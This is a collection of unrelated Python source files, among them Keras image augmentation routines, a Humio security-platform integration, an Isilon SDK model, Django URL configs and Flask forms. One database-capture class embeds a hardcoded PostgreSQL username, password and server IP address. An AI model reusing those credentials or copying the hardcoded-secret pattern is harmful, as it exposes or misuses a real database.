row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order: int, order of spline interpolation.
see `ndimage.interpolation.affine_transform`
Returns:
Sheared Numpy image tensor.
"""
shear = np.random.uniform(-intensity, intensity)
x = apply_affine_transform(
x,
shear=shear,
row_axis=row_axis,
col_axis=col_axis,
channel_axis=channel_axis,
fill_mode=fill_mode,
cval=cval,
order=interpolation_order)
return x
@keras_export('keras.preprocessing.image.random_zoom')
def random_zoom(x, zoom_range, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random spatial zoom of a Numpy image tensor.
Warning: `tf.keras.preprocessing.image.random_zoom` does not operate on
tensors and is not recommended for new code. Prefer
`tf.keras.layers.RandomZoom` which provides equivalent functionality as
a preprocessing layer. For more information, see the tutorial for
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
Args:
x: Input tensor. Must be 3D.
zoom_range: Tuple of floats; zoom range for width and height.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order: int, order of spline interpolation.
see `ndimage.interpolation.affine_transform`
Returns:
Zoomed Numpy image tensor.
Raises:
ValueError: if `zoom_range` isn't a tuple.
"""
if len(zoom_range) != 2:
raise ValueError('`zoom_range` should be a tuple or list of two'
' floats. Received: %s' % (zoom_range,))
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
x = apply_affine_transform(
x,
zx=zx,
zy=zy,
row_axis=row_axis,
col_axis=col_axis,
channel_axis=channel_axis,
fill_mode=fill_mode,
cval=cval,
order=interpolation_order)
return x
@keras_export('keras.preprocessing.image.apply_channel_shift')
def apply_channel_shift(x, intensity, channel_axis=0):
"""Performs a channel shift.
Args:
x: Input tensor. Must be 3D.
intensity: Transformation intensity.
channel_axis: Index of axis for channels in the input tensor.
Returns:
Numpy image tensor.
"""
x = np.rollaxis(x, channel_axis, 0)
min_x, max_x = np.min(x), np.max(x)
channel_images = [
np.clip(x_channel + intensity, min_x, max_x) for x_channel in x]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_axis + 1)
return x
@keras_export('keras.preprocessing.image.random_channel_shift')
def random_channel_shift(x, intensity_range, channel_axis=0):
"""Performs a random channel shift.
Args:
x: Input tensor. Must be 3D.
intensity_range: Transformation intensity.
channel_axis: Index of axis for channels in the input tensor.
Returns:
Numpy image tensor.
"""
intensity = np.random.uniform(-intensity_range, intensity_range)
return apply_channel_shift(x, intensity, channel_axis=channel_axis)
@keras_export('keras.preprocessing.image.apply_brightness_shift')
def apply_brightness_shift(x, brightness, scale=True):
"""Performs a brightness shift.
Args:
x: Input tensor. Must be 3D.
brightness: Float. The new brightness value.
scale: Whether to rescale the image such that minimum and maximum values
are 0 and 255 respectively. Default: True.
Returns:
Numpy image tensor.
Raises:
ImportError: if PIL is not available.
"""
if ImageEnhance is None:
raise ImportError('Using brightness shifts requires PIL. '
'Install PIL or Pillow.')
x_min, x_max = np.min(x), np.max(x)
local_scale = (x_min < 0) or (x_max > 255)
x = array_to_img(x, scale=local_scale or scale)
x = imgenhancer_Brightness = ImageEnhance.Brightness(x)
x = imgenhancer_Brightness.enhance(brightness)
x = img_to_array(x)
if not scale and local_scale:
x = x / 255 * (x_max - x_min) + x_min
return x
@keras_export('keras.preprocessing.image.random_brightness')
def random_brightness(x, brightness_range, scale=True):
"""Performs a random brightness shift.
Warning: `tf.keras.preprocessing.image.random_brightness` does not operate on
tensors and is not recommended for new code. Prefer
`tf.keras.layers.RandomBrightness` which provides equivalent functionality as
a preprocessing layer. For more information, see the tutorial for
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
Args:
x: Input tensor. Must be 3D.
brightness_range: Tuple of floats; brightness range.
scale: Whether to rescale the image such that minimum and maximum values
are 0 and 255 respectively. Default: True.
Returns:
Numpy image tensor.
Raises:
ValueError if `brightness_range` isn't a tuple.
"""
if len(brightness_range) != 2:
raise ValueError(
'`brightness_range should be tuple or list of two floats. '
'Received: %s' % (brightness_range,))
u = np.random.uniform(brightness_range[0], brightness_range[1])
return apply_brightness_shift(x, u, scale)
def transform_matrix_offset_center(matrix, x, y):
o_x = float(x) / 2 - 0.5
o_y = float(y) / 2 - 0.5
offset_matrix = np.array([[1, 0, o_x], [0, 1, o_y], [0, 0, 1]])
reset_matrix = np.array([[1, 0, -o_x], [0, 1, -o_y], [0, 0, 1]])
transform_matrix = np.dot(np.dot(offset_matrix, matrix), reset_matrix)
return transform_matrix
@keras_export('keras.preprocessing.image.apply_affine_transform')
def apply_affine_transform(x, theta=0, tx=0, ty=0, shear=0, zx=1, zy=1,
row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0., order=1):
"""Applies an affine transformation specified by the parameters given.
Args:
x: 3D numpy array - a 2D image with one or more channels.
theta: Rotation angle in degrees.
tx: Width shift.
ty: Heigh shift.
shear: Shear angle in degrees.
zx: Zoom in x direction.
zy: Zoom in y direction
row_axis: Index of axis for rows (aka Y axis) in the input
image. Direction: left to right.
col_axis: Index of axis for columns (aka X axis) in the input
image. Direction: top to bottom.
channel_axis: Index of axis for channels in the input image.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
order: int, order of interpolation
Returns:
The transformed version of the input.
Raises:
ImportError: if SciPy is not available.
"""
if scipy is None:
raise ImportError('Image transformations require SciPy. '
'Install SciPy.')
# Input sanity checks:
# 1. x must 2D image with one or more channels (i.e., a 3D tensor)
# 2. channels must be either first or last dimension
if np.unique([row_axis, col_axis, channel_axis]).size != 3:
raise ValueError("'row_axis', 'col_axis', and 'channel_axis'"
" must be distinct")
# shall we support negative indices?
valid_indices = set([0, 1, 2])
actual_indices = set([row_axis, col_axis, channel_axis])
if actual_indices != valid_indices:
raise ValueError(
f'Invalid axis\' indices: {actual_indices - valid_indices}')
if x.ndim != 3:
raise ValueError('Input arrays must be multi-channel 2D images.')
if channel_axis not in [0, 2]:
raise ValueError('Channels are allowed and the first and last dimensions.')
transform_matrix = None
if theta != 0:
theta = np.deg2rad(theta)
rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0],
[np.sin(theta), np.cos(theta), 0],
[0, 0, 1]])
transform_matrix = rotation_matrix
if tx != 0 or ty != 0:
shift_matrix = np.array([[1, 0, tx],
[0, 1, ty],
[0, 0, 1]])
if transform_matrix is None:
transform_matrix = shift_matrix
else:
transform_matrix = np.dot(transform_matrix, shift_matrix)
if shear != 0:
shear = np.deg2rad(shear)
shear_matrix = np.array([[1, -np.sin(shear), 0],
[0, np.cos(shear), 0],
[0, 0, 1]])
if transform_matrix is None:
transform_matrix = shear_matrix
else:
transform_matrix = np.dot(transform_matrix, shear_matrix)
if zx != 1 or zy != 1:
zoom_matrix = np.array([[zx, 0, 0],
[0, zy, 0],
[0, 0, 1]])
if transform_matrix is None:
transform_matrix = zoom_matrix
else:
transform_matrix = np.dot(transform_matrix, zoom_matrix)
if transform_matrix is not None:
h, w = x.shape[row_axis], x.shape[col_axis]
transform_matrix = transform_matrix_offset_center(
transform_matrix, h, w)
x = np.rollaxis(x, channel_axis, 0)
# Matrix construction assumes that coordinates are x, y (in that order).
# However, regular numpy arrays use y,x (aka i,j) indexing.
# Possible solution is:
# 1. Swap the x and y axes.
# 2. Apply transform.
# 3. Swap the x and y axes again to restore image-like data ordering.
# Mathematically, it is equivalent to the following transformation:
# M' = PMP, where P is the permutation matrix, M is the original
# transformation matrix.
if col_axis > row_axis:
transform_matrix[:, [0, 1]] = transform_matrix[:, [1, 0]]
transform_matrix[[0, 1]] = transform_matrix[[1, 0]]
final_affine_matrix = transform_matrix[:2, :2]
final_offset = transform_matrix[:2, 2]
channel_images = [ndimage.interpolation.affine_transform( # pylint: disable=g-complex-comprehension
x_channel,
final_affine_matrix,
final_offset,
order=order,
mode=fill_mode,
cval=cval) for x_channel in x]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_axis + 1)
return x
|
'''HDF5 operating system operations.
license: HDF5Application/license.txt
Main authors:
Philipp Bucher
Michael Andre
'''
import KratosMultiphysics
import KratosMultiphysics.kratos_utilities as _utils
import os
class DeleteOldH5Files(object):
'''Delete h5-files from previous simulations.'''
def __call__(self, model_part, hdf5_file):
file_path, file_name = os.path.split(hdf5_file.GetFileName())
time_prefix = file_name.replace(".h5", "") + "-"
current_time = model_part.ProcessInfo[KratosMultiphysics.TIME]
if file_path == "":
file_path = "." # os.listdir fails with empty path
for name in os.listdir(file_path):
if name.startswith(time_prefix):
file_time = float(name.replace(".h5", "")[len(time_prefix):])
if file_time > current_time:
_utils.DeleteFileIfExisting(
os.path.join(file_path, name))
def Create(settings):
'''Return an operation specified by the setting's 'operation_type'.
This method is normally not used directly, but rather it is imported
in core.operations.model_part.Create using the 'module_name' setting.
'''
operation_type = settings['operation_type'].GetString()
if operation_type == 'delete_old_h5_files':
return DeleteOldH5Files()
else:
raise ValueError(
'"operation_type" has invalid value "' + operation_type + '"')
|
from flask_wtf import FlaskForm
from wtforms import StringField,TextAreaField,SubmitField, SelectField
from wtforms.validators import Required
class CommentsForm(FlaskForm):
comment = TextAreaField('Comment', validators=[Required()])
submit = SubmitField('SUBMIT')
class UpdateProfile(FlaskForm):
bio = TextAreaField('Tell us about you.',validators = [Required()])
submit = SubmitField('Submit')
class BlogForm(FlaskForm):
title = StringField('Enter title',validators = [Required()])
subtitle= StringField('Enter subtitle',validators = [Required()])
content = TextAreaField('make a blog', validators=[Required()])
submit = SubmitField('Create Blog')
|
"""
NLP Sandbox Date Annotator API
# Overview The OpenAPI specification implemented by NLP Sandbox Annotators. # noqa: E501
The version of the OpenAPI document: 1.1.1
Contact: thomas.schaffter@sagebionetworks.org
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import nlpsandbox
from nlpsandbox.model.text_covid_symptom_annotation import TextCovidSymptomAnnotation
globals()['TextCovidSymptomAnnotation'] = TextCovidSymptomAnnotation
from nlpsandbox.model.text_covid_symptom_annotation_response import TextCovidSymptomAnnotationResponse
class TestTextCovidSymptomAnnotationResponse(unittest.TestCase):
"""TextCovidSymptomAnnotationResponse unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testTextCovidSymptomAnnotationResponse(self):
"""Test TextCovidSymptomAnnotationResponse"""
# FIXME: construct object with mandatory attributes with example values
# model = TextCovidSymptomAnnotationResponse() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
import json
from datetime import datetime
from typing import Dict
import requests
import demistomock as demisto
from CommonServerPython import *
""" IMPORTS """
# Disable insecure warnings from urllib3
# - this does not disable SSL checking, just the warnings logged from urllib3
requests.packages.urllib3.disable_warnings()
""" CLASS for Humio"""
class Client:
def __init__(self, base_url, verify, proxies):
self.base_url = base_url
self.verify = verify
self.proxies = proxies
def http_request(self, method, url_suffix, data=None, headers=None):
server = self.base_url + url_suffix
res = requests.request(
method,
server,
json=data,
verify=self.verify,
headers=headers,
proxies=self.proxies,
)
return res
def test_module(client, headers=None):
response = client.http_request("GET", "/api/v1/status")
headers = {} if headers is None else headers
if response.status_code == 200:
try:
resp = response.json()
except Exception:
return "Could connect to server, but got unexpected response: {}".format(
response.text
)
if resp["status"].lower() == "ok":
incidentquery = demisto.params().get("queryParameter")
incidentrepo = demisto.params().get("queryRepository")
if incidentquery is not None and incidentrepo is not None:
args = {
"queryString": incidentquery,
"repository": incidentrepo,
"start": "1m",
"end": "now",
"isLive": "false",
"timeZoneOffsetMinutes": 0,
}
humio_query(client, args, headers)
return "ok"
else:
return "ok"
else:
return "Bad status from server: ({}) {}".format(
response.status_code, response.text
)
def humio_query(client, args, headers):
data = {}
data["queryString"] = args.get("queryString")
try:
data["start"] = int(args.get("start"))
except ValueError:
data["start"] = args.get("start")
try:
data["end"] = int(args.get("end"))
except ValueError:
data["end"] = args.get("end")
data["isLive"] = args.get("isLive").lower() in ["true", "1", "t", "y", "yes"]
data["timeZoneOffsetMinutes"] = int(args.get("timeZoneOffsetMinutes", 0))
if args.get("arguments"):
data["arguments"] = args.get("arguments")
url = "/api/v1/repositories/" + args.get("repository") + "/query"
headers["Accept"] = "application/json"
response = client.http_request("POST", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Query Results", result, removeNull=True)
outputs = {"Humio.Query": [result]}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_query_job(client, args, headers):
data = {}
data["queryString"] = args.get("queryString")
data["start"] = args.get("start")
data["end"] = args.get("end")
data["isLive"] = args.get("isLive").lower() in ["true", "1", "t", "y", "yes"]
data["timeZoneOffsetMinutes"] = int(args.get("timeZoneOffsetMinutes"))
if args.get("arguments"):
data["arguments"] = args.get("arguments")
url = "/api/v1/repositories/" + args.get("repository") + "/queryjobs"
headers["Accept"] = "application/json"
response = client.http_request("POST", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Query Job", result, removeNull=True)
outputs = {"Humio.Job": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_poll(client, args, headers):
data: Dict[str, str] = {}
url = (
"/api/v1/repositories/"
+ args.get("repository")
+ "/queryjobs/"
+ args.get("id")
)
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
result = response.json()
result["job_id"] = args.get("id")
markdown = tableToMarkdown(
"Humio Poll Result", result.get("events", []), removeNull=True
)
outputs = {"Humio.Result(val.job_id == obj.job_id)": result}
return markdown, outputs, result
elif response.status_code == 404:
raise ValueError(response.text)
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_delete_job(client, args, headers):
data: Dict[str, str] = {}
url = (
"/api/v1/repositories/"
+ args.get("repository")
+ "/queryjobs/"
+ args.get("id")
)
headers["Accept"] = "application/json"
response = client.http_request("DELETE", url, data, headers)
if response.status_code == 204:
return "Command executed. Status code " + str(response), None, None
elif response.status_code == 404:
raise ValueError(response.text)
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_list_alerts(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alerts"
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Alerts", result, removeNull=True)
outputs = {"Humio.Alert(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_get_alert_by_id(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alerts/" + args.get("id")
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
if not response.text:
raise ValueError("Alert with id " + str(args.get("id")) + " not found")
result = response.json()
markdown = tableToMarkdown("Humio Alerts", result, removeNull=True)
outputs = {"Humio.Alert(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_create_alert(client, args, headers):
fulldata = {}
data = {}
data["queryString"] = args.get("queryString")
data["start"] = args.get("start")
data["end"] = "now"
data["isLive"] = True
fulldata["name"] = args.get("name")
fulldata["description"] = args.get("description", "")
fulldata["throttleTimeMillis"] = int(args.get("throttleTimeMillis"))
fulldata["silenced"] = args.get("silenced", "false").lower() in [
"true",
"1",
"t",
"y",
"yes",
]
fulldata["notifiers"] = [
notifier for notifier in args.get("notifiers").split(",") if notifier
]
fulldata["labels"] = [label for label in args.get("labels", "").split(",") if label]
fulldata["query"] = data
url = "/api/v1/repositories/" + args.get("repository") + "/alerts"
headers["Accept"] = "application/json"
response = client.http_request("POST", url, fulldata, headers)
if response.status_code == 201:
result = response.json()
markdown = tableToMarkdown("Humio Alerts", result, removeNull=True)
outputs = {"Humio.Alert(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_delete_alert(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alerts/" + args.get("id")
headers["Accept"] = "application/json"
response = client.http_request("DELETE", url, data, headers)
if response.status_code == 204:
return ("Command executed. Status code " + str(response), None, None)
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_list_notifiers(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alertnotifiers"
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Notifiers", result, removeNull=True)
outputs = {"Humio.Notifier(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_get_notifier_by_id(client, args, headers):
data: Dict[str, str] = {}
url = (
"/api/v1/repositories/"
+ args.get("repository")
+ "/alertnotifiers/"
+ args.get("id")
)
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
if not response.text:
raise ValueError("Notifier with id " + str(args.get("id")) + " not found")
result = response.json()
markdown = tableToMarkdown("Humio Notifiers", result, removeNull=True)
outputs = {"Humio.Notifier(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def fetch_incidents(client, headers):
incidentquery = demisto.params().get("queryParameter")
incidentrepo = demisto.params().get("queryRepository")
timestampfrom = demisto.params().get("queryStartTime")
lastrun = demisto.getLastRun()
url = "/api/v1/repositories/" + incidentrepo + "/query"
headers["Accept"] = "application/json"
# set maximum of 50 returned events (this is idempotent)
incidentquery = incidentquery + "| head(50)"
backup_ts = int(datetime.now().timestamp()) * 1000
last_run_time = lastrun.get("time")
data = {
"queryString": incidentquery,
"end": "now",
"isLive": False,
"timeZoneOffsetMinutes": int(
demisto.params().get("queryTimeZoneOffsetMinutes")
),
}
if last_run_time is None:
# First run
data["start"] = timestampfrom
max_ts = 0
else:
data["start"] = int(last_run_time)
max_ts = int(last_run_time)
response = client.http_request("POST", url, data, headers)
if response.status_code == 200:
response_data = response.json()
for result in response_data:
ts = int(result.get("@timestamp", backup_ts))
if ts > max_ts:
max_ts = ts
max_ts += 1
demisto.setLastRun({"time": max_ts})
return form_incindents(response_data)
else:
raise ValueError(
"Error in fetching incidents. Error from server was: " + str(response.text)
)
def create_incident_from_humioquery(incident):
occurred = datetime.fromtimestamp(incident["@timestamp"] / 1000.0).strftime(
"%Y-%m-%dT%H:%M:%SZ"
)
keys = incident.keys()
labels = []
for key in keys:
labels.append({"type": key, "value": str(incident[key])})
return {
"name": "Humio Incident {id}".format(id=incident["@id"]),
"labels": labels,
"rawJSON": json.dumps(incident),
"occurred": occurred,
}
def form_incindents(incidents):
returnableincidents = []
for item in incidents:
returnableincidents.append(create_incident_from_humioquery(item))
return returnableincidents
def main():
apikey = demisto.params().get("API-key")
baseserver = (
demisto.params()["url"][:-1]
if (demisto.params()["url"] and demisto.params()["url"].endswith("/"))
else demisto.params()["url"]
)
verify_certificate = not demisto.params().get("insecure", False)
proxies = handle_proxy()
headers = {}
headers["Content-Type"] = "application/json"
headers["Authorization"] = "Bearer " + apikey
command = demisto.command()
LOG(f"Command being called is {command}")
try:
client = Client(baseserver, verify_certificate, proxies)
commands = {
"humio-query": humio_query,
"humio-query-job": humio_query_job,
"humio-poll": humio_poll,
"humio-delete-job": humio_delete_job,
"humio-list-alerts": humio_list_alerts,
"humio-get-alert-by-id": humio_get_alert_by_id,
"humio-create-alert": humio_create_alert,
"humio-delete-alert": humio_delete_alert,
"humio-list-notifiers": humio_list_notifiers,
"humio-get-notifier-by-id": humio_get_notifier_by_id,
}
if command == "test-module":
results = test_module(client, headers)
return_outputs(results)
elif demisto.command() == "fetch-incidents":
demisto.incidents(fetch_incidents(client, headers))
elif command in commands:
return_outputs(*commands[command](client, demisto.args(), headers))
except Exception as e:
return_error(str(e))
if __name__ in ["__main__", "builtin", "builtins"]:
main()
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 9
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from isi_sdk_8_2_2.models.drives_drive_firmware_update_node_status import DrivesDriveFirmwareUpdateNodeStatus # noqa: F401,E501
class DrivesDriveFirmwareUpdateNode(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'error': 'str',
'id': 'int',
'lnn': 'int',
'status': 'DrivesDriveFirmwareUpdateNodeStatus'
}
attribute_map = {
'error': 'error',
'id': 'id',
'lnn': 'lnn',
'status': 'status'
}
def __init__(self, error=None, id=None, lnn=None, status=None): # noqa: E501
"""DrivesDriveFirmwareUpdateNode - a model defined in Swagger""" # noqa: E501
self._error = None
self._id = None
self._lnn = None
self._status = None
self.discriminator = None
if error is not None:
self.error = error
if id is not None:
self.id = id
if lnn is not None:
self.lnn = lnn
if status is not None:
self.status = status
@property
def error(self):
"""Gets the error of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Error message, if the HTTP status returned from this node was not 200. # noqa: E501
:return: The error of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: str
"""
return self._error
@error.setter
def error(self, error):
"""Sets the error of this DrivesDriveFirmwareUpdateNode.
Error message, if the HTTP status returned from this node was not 200. # noqa: E501
:param error: The error of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: str
"""
if error is not None and len(error) > 8192:
raise ValueError("Invalid value for `error`, length must be less than or equal to `8192`") # noqa: E501
if error is not None and len(error) < 0:
raise ValueError("Invalid value for `error`, length must be greater than or equal to `0`") # noqa: E501
self._error = error
@property
def id(self):
"""Gets the id of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Node ID (Device Number) of a node. # noqa: E501
:return: The id of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this DrivesDriveFirmwareUpdateNode.
Node ID (Device Number) of a node. # noqa: E501
:param id: The id of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: int
"""
if id is not None and id > 2147483647: # noqa: E501
raise ValueError("Invalid value for `id`, must be a value less than or equal to `2147483647`") # noqa: E501
if id is not None and id < 0: # noqa: E501
raise ValueError("Invalid value for `id`, must be a value greater than or equal to `0`") # noqa: E501
self._id = id
@property
def lnn(self):
"""Gets the lnn of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Logical Node Number (LNN) of a node. # noqa: E501
:return: The lnn of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: int
"""
return self._lnn
@lnn.setter
def lnn(self, lnn):
"""Sets the lnn of this DrivesDriveFirmwareUpdateNode.
Logical Node Number (LNN) of a node. # noqa: E501
:param lnn: The lnn of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: int
"""
if lnn is not None and lnn > 65535: # noqa: E501
raise ValueError("Invalid value for `lnn`, must be a value less than or equal to `65535`") # noqa: E501
if lnn is not None and lnn < 1: # noqa: E501
raise ValueError("Invalid value for `lnn`, must be a value greater than or equal to `1`") # noqa: E501
self._lnn = lnn
@property
def status(self):
"""Gets the status of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Drive firmware update status information. # noqa: E501
:return: The status of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: DrivesDriveFirmwareUpdateNodeStatus
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this DrivesDriveFirmwareUpdateNode.
Drive firmware update status information. # noqa: E501
:param status: The status of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: DrivesDriveFirmwareUpdateNodeStatus
"""
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DrivesDriveFirmwareUpdateNode):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from django.conf.urls import url, include
from branches import region, branch, resource
urlpatterns = [
url(r'^$', region.region_list, name='branches'),
url(r'^region/add/$', region.region_add, name='region_add'),
url(r'^region/list/$', region.region_list, name='region_list'),
url(r'^region/branch_detail/(?P<region_id>\d+)/$', region.branch_detail, name='branch_detail'),
url(r'^region/edit/(?P<region_id>\d+)/$', region.region_edit, name='region_edit'),
url(r'^region/delete/$', region.region_del, name='region_del'),
url(r'^branch/add/$', branch.branch_add, name='branch_add'),
url(r'^branch/list/$', branch.branch_list, name='branch_list'),
url(r'^branch/edit/(?P<branch_id>\d+)/$', branch.branch_edit, name='branch_edit'),
url(r'^branch/delete/$', branch.branch_del, name='branch_del'),
url(r'^branch/export/$', branch.branch_export, name='branch_export'),
url(r'^branch/resource_detail/(?P<branch_id>\d+)/$', branch.resource_detail, name='resource_detail'),
url(r'^resource/add/$', resource.resource_add, name='resource_add'),
url(r'^resource/list/$', resource.resource_list, name='resource_list'),
url(r'^resource/edit/(?P<resource_id>\d+)/$', resource.resource_edit, name='resource_edit'),
url(r'^resource/delete/$', resource.resource_del, name='resource_del'),
url(r'^resource/export/$', resource.resource_export, name='resource_export'),
]
|
"""awards URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from django.contrib.auth import views
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
url(r'^admin/', admin.site.urls),
url('', include('project.urls')),
url(r'^accounts/', include('registration.backends.simple.urls')),
url(r'^logout/$', views.logout, {"next_page": '/'} ),
url(r'^api-token-auth/', obtain_auth_token),
]
|
import requests
import sqlalchemy
import xmltodict
from sqlalchemy import create_engine, MetaData
from collections import defaultdict
import datetime
from utils import *
class Capture(object):
def __init__(self,
schema,
database='projetocurio'
):
self.schema = schema
self.database = database
self.engine = self.connect_to_db()
self.meta = self.load_db_schema()
self.url = None
self.data = None
def connect_to_db(self):
return create_engine('postgresql://uploaddata:VgyBhu876%%%@104.155.150.247:5432/projetocurio')
def load_db_schema(self):
metadata = MetaData()
metadata.reflect(self.engine, schema='camara_v1')
return metadata
def request(self, url):
data = requests.get(url)
if data.status_code == 200:
self.data = data.text
else:
self.data = None
def xml_to_dict(self):
self.data = xmltodict.parse(self.data)
def to_default_dict(self, list_of_dic):
return [defaultdict(lambda: None, dic) for dic in force_list(list_of_dic)]
def capture_data(self, url):
self.request(url)
self.xml_to_dict()
def insert_data(self, list_of_dic, table):
table_string = self.schema + '.' + table
with self.engine.connect() as conn:
print('inserting data')
for dic in list_of_dic:
conn.execute(self.meta.tables[table_string].insert(), dic)
print('closing connection')
|
# -*- coding: utf-8 -*-
# Copyright 2013-2017 Ent. Services Development Corporation LP
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
